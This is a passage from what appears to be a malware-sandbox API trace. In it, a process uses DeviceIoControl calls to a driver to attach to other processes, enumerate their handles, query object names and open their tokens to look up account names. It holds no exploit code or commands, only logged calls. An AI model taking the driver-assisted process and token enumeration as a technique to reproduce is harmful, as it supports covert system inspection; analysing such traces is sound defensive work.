ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.332] ObReferenceObjectByHandle (in: Handle=0x38c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001bb5080, HandleInformation=0x0) returned 0x0 [0161.332] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.332] PsReleaseProcessExitSynchronization () returned 0x2 [0161.332] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.332] ObQueryNameString (in: Object=0xfffff8a001bb5080, ObjectNameInfo=0xfffffa8002ff5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ff5044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.332] ObfDereferenceObject (Object=0xfffff8a001bb5080) returned 0x2 [0161.332] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.332] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa7c) returned 0xc8 [0161.333] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0161.333] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020f7390, HandleInformation=0x0) returned 0x0 [0161.333] ObOpenObjectByPointer (in: Object=0xfffffa80020f7390, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0161.333] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x41 [0161.333] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa8002530780 | out: TokenHandle=0xfffffa8002530780*=0xc4) returned 0x0 [0161.333] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0161.333] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.333] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0161.333] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0161.336] CloseHandle (hObject=0xc4) returned 1 [0161.336] CloseHandle (hObject=0xc8) returned 1 [0161.336] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.337] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0161.337] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.337] PsAcquireProcessExitSynchronization () returned 0x0 [0161.337] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0) [0161.337] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ee3070, HandleInformation=0x0) returned 0x0 [0161.337] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.337] PsReleaseProcessExitSynchronization () returned 0x2 [0161.337] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3f [0161.337] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.337] ObfDereferenceObject (Object=0xfffffa8001ee3070) returned 0x1 [0161.337] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.337] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.337] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.337] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0161.337] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.337] PsAcquireProcessExitSynchronization () returned 0x0 [0161.337] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0) [0161.337] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fe7380, HandleInformation=0x0) returned 0x0 [0161.337] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.337] PsReleaseProcessExitSynchronization () returned 0x2 [0161.337] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3f [0161.337] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa8044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.338] ObfDereferenceObject (Object=0xfffffa8001fe7380) returned 0x1 [0161.338] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.338] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.338] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.338] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0161.338] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.338] PsAcquireProcessExitSynchronization () returned 0x0 [0161.338] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0) [0161.338] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0161.338] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.338] PsReleaseProcessExitSynchronization () returned 0x2 [0161.338] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3f [0161.338] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80030c9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c9044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.338] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xe [0161.338] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.338] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.338] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.338] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0161.338] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.338] PsAcquireProcessExitSynchronization () returned 0x0 [0161.338] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0) [0161.339] ObReferenceObjectByHandle (in: Handle=0x114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ea7620, HandleInformation=0x0) returned 0x0 [0161.339] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.339] PsReleaseProcessExitSynchronization () returned 0x2 [0161.339] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3f [0161.339] ObQueryNameString (in: Object=0xfffffa8001ea7620, ObjectNameInfo=0xfffffa8003034044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003034044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.339] ObfDereferenceObject (Object=0xfffffa8001ea7620) returned 0x1 [0161.339] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.339] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.339] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.339] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0161.339] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.339] PsAcquireProcessExitSynchronization () returned 0x0 [0161.339] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0) [0161.339] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e80e80, HandleInformation=0x0) returned 0x0 [0161.339] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.339] PsReleaseProcessExitSynchronization () returned 0x2 [0161.339] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3f [0161.339] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.339] ObfDereferenceObject (Object=0xfffffa8001e80e80) returned 0x1 [0161.339] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.339] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.339] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.340] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0161.340] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.340] PsAcquireProcessExitSynchronization () returned 0x0 [0161.340] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0) [0161.340] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001febe60, HandleInformation=0x0) returned 0x0 [0161.340] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.340] PsReleaseProcessExitSynchronization () returned 0x2 [0161.340] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3f [0161.340] ObQueryNameString (in: Object=0xfffffa8001febe60, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.340] ObfDereferenceObject (Object=0xfffffa8001febe60) returned 0x10 [0161.340] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.340] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.340] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.340] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0161.340] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.340] PsAcquireProcessExitSynchronization () returned 0x0 [0161.340] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0) [0161.340] ObReferenceObjectByHandle (in: Handle=0x1cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003566bc0, HandleInformation=0x0) returned 0x0 [0161.340] ObfDereferenceObject (Object=0xfffffa8003566bc0) returned 0x1e [0161.340] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.341] PsReleaseProcessExitSynchronization () returned 0x2 [0161.341] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3f [0161.341] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.341] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.341] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.341] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0161.341] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.341] PsAcquireProcessExitSynchronization () returned 0x0 [0161.341] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0) [0161.341] ObReferenceObjectByHandle (in: Handle=0x1d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002eebdc0, HandleInformation=0x0) returned 0x0 [0161.341] ObfDereferenceObject (Object=0xfffffa8002eebdc0) returned 0x5 [0161.341] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.341] PsReleaseProcessExitSynchronization () returned 0x2 [0161.341] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3f [0161.341] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.341] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.341] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.341] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0161.341] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.341] PsAcquireProcessExitSynchronization () returned 0x0 [0161.342] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880051635d0) [0161.342] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0161.342] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.342] PsReleaseProcessExitSynchronization () returned 0x2 [0161.342] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3f [0161.342] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.342] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa4c) returned 0xc8 [0161.342] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0161.342] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800202c060, HandleInformation=0x0) returned 0x0 [0161.342] ObOpenObjectByPointer (in: Object=0xfffffa800202c060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0161.342] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x20 [0161.342] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa8002530780 | out: TokenHandle=0xfffffa8002530780*=0xc4) returned 0x0 [0161.342] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0161.342] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.342] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0161.343] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0161.345] CloseHandle (hObject=0xc4) returned 1 [0161.345] CloseHandle (hObject=0xc8) returned 1 [0161.345] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.345] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0161.345] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.345] PsAcquireProcessExitSynchronization () returned 0x0 [0161.345] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.345] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f0c7d0, HandleInformation=0x0) returned 0x0 [0161.345] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.345] PsReleaseProcessExitSynchronization () returned 0x2 [0161.345] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.345] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.346] ObfDereferenceObject (Object=0xfffffa8001f0c7d0) returned 0x1 [0161.346] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.346] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.346] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.346] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0161.346] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.346] PsAcquireProcessExitSynchronization () returned 0x0 [0161.346] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.346] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80021a3b20, HandleInformation=0x0) returned 0x0 [0161.346] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.346] PsReleaseProcessExitSynchronization () returned 0x2 [0161.346] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.346] ObQueryNameString (in: Object=0xfffffa80021a3b20, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.346] ObfDereferenceObject (Object=0xfffffa80021a3b20) returned 0x1 [0161.346] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.346] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.346] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.346] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0161.347] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.347] PsAcquireProcessExitSynchronization () returned 0x0 [0161.347] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.347] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0161.347] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.347] PsReleaseProcessExitSynchronization () returned 0x2 [0161.347] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.347] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030da044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030da044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.347] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0161.347] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.347] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.347] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.347] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0161.347] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.347] PsAcquireProcessExitSynchronization () returned 0x0 [0161.347] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880051635d0) [0161.347] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e99070, HandleInformation=0x0) returned 0x0 [0161.347] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.347] PsReleaseProcessExitSynchronization () returned 0x2 [0161.347] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0161.347] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163508 | out: 